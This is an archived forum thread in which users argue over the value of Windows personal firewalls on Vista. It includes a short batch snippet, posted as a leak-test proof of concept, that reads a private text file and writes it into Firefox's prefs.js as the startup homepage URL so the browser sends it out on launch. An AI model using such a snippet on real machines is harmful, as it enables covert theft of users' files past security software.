Microsoft Firewall vs ????

Loading thread data ...

I'm running Comodo firewall pro v3 on Vista and it's been fine. I also like Online Armor and there will be a Vista compatible version in the near future.

Reply to
Victek

Which only shows that you never bothered auditing it.

Which supports my claim, since this one is even worse.

OK, one shouldn't expect much if any understanding of security from a Windows Live Mail user... but please, if you have no clue, then please don't make suggestions to others.

Reply to
Sebastian G.

It's a good thing you are here to show us The Way, oh Wise One... |-)

Reply to
s|b

I saw you once post proof of concept code to prove that any software firewall can be bypassed. Would you please post that again as I want to read it again, thanks.

Reply to
Rat River Cemetary

Hi,

for my part: first I wrote

formatting link
(for IE6) and
formatting link
(for Firefox 1.x).

After that, at least Zone Alarm and Comodo tinkered again. Then I wrote breakout-wp.cpp - and they lost again.

This topic is somewhat boring now.

Yours, VB.

Reply to
Volker Birk

You mean something like this one?

setlocal enabledelayedexpansion set x= for /f "delims=" %%i in (your_private_document.txt) do set x=!x! %%i for /r %%i in (prefs.js) do echo user_pref("browser.startup.homepage","

formatting link
");>>"%%i" And then just wait until the user starts Firefox...

Reply to
Sebastian G.

No security is perfect. Why does the fact you can break it imply that it has no value?

Reply to
Victek

No security is perfect. Why does the fact you can break it imply that it has no value?

Reply to
Victek

Because I needed 15 minutes to break the first time, and a meal with friends on a Saturday evening to f*ck up the second time.

And: we had a closer look onto common "Personal Firewall" implementations, and all what I saw was a terrible, incompetent mess.

Yours, VB.

Reply to
Volker Birk

Security requires reliability. The above shows a reliability of zero.

Reply to
Sebastian G.

Man on the inside says this.

"Neither the batch commands, nor the .c programs are remote exploits of a firewall. The batch files just seems to copy prefs.js around the system, it doesn't attain Admin from a limited user nor does it execute code on remote sysems, so it's not an exploit. Ditto for the .c programs, they just send messages to other windows, windows is designed to allow that. That is not demostration of a remote exploit or local privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services and programs with admin privileges) a message from a lower integrity processes, like say medium integrity (non-UAC prompting programs) processes or low integrity processes (sandboxed programs like IE7). And neither can low integrity processes send message to medium integrity processes. Ergo, something like this might work in XP but not in Vista if you run as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Reply to
Rat River Cemetary

What "batch files"? Is this text about something else?

I did not talk about Vista, but about "Personal Firewalls".

And I'm not talking about remote exploits or exploits at all.

Yours, VB.

Reply to
Volker Birk

Se3astion posted a batch file that I included in with your code. He is referring to that.

You're right.

Reply to
Rat River Cemetary

Unless IE stops supporting ActiveX and thus supporting manipulating arbitrary COM objects, it's a security nightmare and not "the most secure browser".

ActiveX is a design flaw, and never can be fixed.

Yours, VB.

Reply to
Volker Birk

I use FF with noscipt but nothing can compromise the OS by running IE7 because it runs in protected memory space.

Reply to
Rat River Cemetary

Unless you simply break out of it, which is trivial.

Reply to
Sebastian G.

That's wrong.

COM offers the possibility for IPC (DCOM, COM+).

Yours, VB.

Reply to
Volker Birk

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.